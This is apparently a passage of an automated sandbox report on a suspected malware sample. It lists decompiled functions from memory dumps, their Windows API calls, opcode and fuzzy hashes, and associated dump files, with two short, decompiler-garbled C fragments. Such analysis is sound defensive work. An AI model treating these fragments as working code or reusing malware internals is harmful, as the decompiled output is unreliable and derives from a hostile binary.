APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D

Memory Dump Source

Source File: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2215533cff683066aaf40974d827eefb610fa1c5ba209237d00df1578578f298
Instruction ID: 3c4ccb3ab7a115bd32a4f8035ad1b557ce754f415dd5b2fc58acafd04765b385
Opcode Fuzzy Hash: 2215533cff683066aaf40974d827eefb610fa1c5ba209237d00df1578578f298
Instruction Fuzzy Hash: A7E022B42042858BEB11EE79C4C08DBBF90EFC57107518A9AE89C0B207C635E56ADB71

Uniqueness

Uniqueness Score: -1.00%

Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E0041A070(intOrPtr _a4, void* _a8, signed char _a12, void* _a16) {
				signed char _t9;
				char _t11;
				void* _t13;
				void* _t16;

				_t7 = _a4;
				_t3 = _t7 + 0xc74; // 0xc74
				E0041A960(_t16, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t9 = _a12;
				_t13 = _a8;
				asm("les edx, [edx+edx*2]");
				_push(_t9 | 0x00000083);
				_t11 = RtlFreeHeap(_t13); // executed
				return _t11;
			}

0x0041a073
0x0041a07f
0x0041a087
0x0041a08f
0x0041a092
0x0041a096
0x0041a09b
0x0041a09d
0x0041a0a1

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D

Memory Dump Source

Source File: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D

Memory Dump Source

Source File: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A0B0(intOrPtr _a4) {
				void* _t8;
				intOrPtr _t9;
				int _t10;
				void* _t11;

				_t6 = _a4;
				_t9 =  *((intOrPtr*)(_a4 + 0xa14));
				E0041A960(_t11, _a4, _t6 + 0xc7c, _t9, 0, 0x36);
				 *((intOrPtr*)(_t8 + 0x68b0c55)) =  *((intOrPtr*)(_t8 + 0x68b0c55)) + _t9;
				ExitProcess(_t10);
			}

0x0041a0b3
0x0041a0b6
0x0041a0ca
0x0041a0ce
0x0041a0d8

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0D8

Memory Dump Source

Source File: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00830080, Relevance: 1.3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

Strings

[Pj, xrefs: 008300D5, 008300C7

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: [Pj
API String ID: 0-2289356113
Opcode ID: 3659c3adf7abaf2b73a28af7263dccba6941adeda9b4de8241761bb4efee5743
Instruction ID: a02f1b4a56a290147a5ed5f4c4b3f9291da0231ed35f05a9720b0223aee6e349
Opcode Fuzzy Hash: 3659c3adf7abaf2b73a28af7263dccba6941adeda9b4de8241761bb4efee5743
Instruction Fuzzy Hash: 35F0F630204704BBD726EB14CCA5F2A7BA5FFD1744F148818F441DA093C776C811DB62

Uniqueness

Uniqueness Score: -1.00%

Function 008526F8, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction ID: 78f75a23e92d3b36c638f2d356d8ce860cb8fa07e2f7408fae717603e046a5af
Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction Fuzzy Hash: 2FF022203240499BCB08EA188C9166A33D5FB9A302FA8C038ED49CB201DA31ED048291

Uniqueness

Uniqueness Score: -1.00%

Function 008300EA, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2844a1a1992ba064c9dbf0f2bf04666654b0b3165ef692fd15c056816545793c
Instruction ID: 289b2b27000ad1dd65984032d187f9e787b3f4398efefa861afd6d32436765bd
Opcode Fuzzy Hash: 2844a1a1992ba064c9dbf0f2bf04666654b0b3165ef692fd15c056816545793c
Instruction Fuzzy Hash: 9FE09A71544B80CBC311DF18CA00B1AB3E8FF88B10F10083AF405C7750D7789A04CA92

Uniqueness

Uniqueness Score: -1.00%

Function 008410D0, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446

Uniqueness

Uniqueness Score: -1.00%

Function 00840060, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E

Uniqueness

Uniqueness Score: -1.00%

Function 008401D4, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96

Uniqueness

Uniqueness Score: -1.00%

Function 0084010C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00841148, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A

Uniqueness

Uniqueness Score: -1.00%

Function 008407AC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 0083F8CC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697

Uniqueness

Uniqueness Score: -1.00%

Function 00841930, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546

Uniqueness

Uniqueness Score: -1.00%

Function 0083F938, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947

Uniqueness

Uniqueness Score: -1.00%

Function 0083FAB8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 0083FA20, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 0083FA50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 0083FBE8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986

Uniqueness

Uniqueness Score: -1.00%

Function 0083FB50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 0083FC30, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 00840C40, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
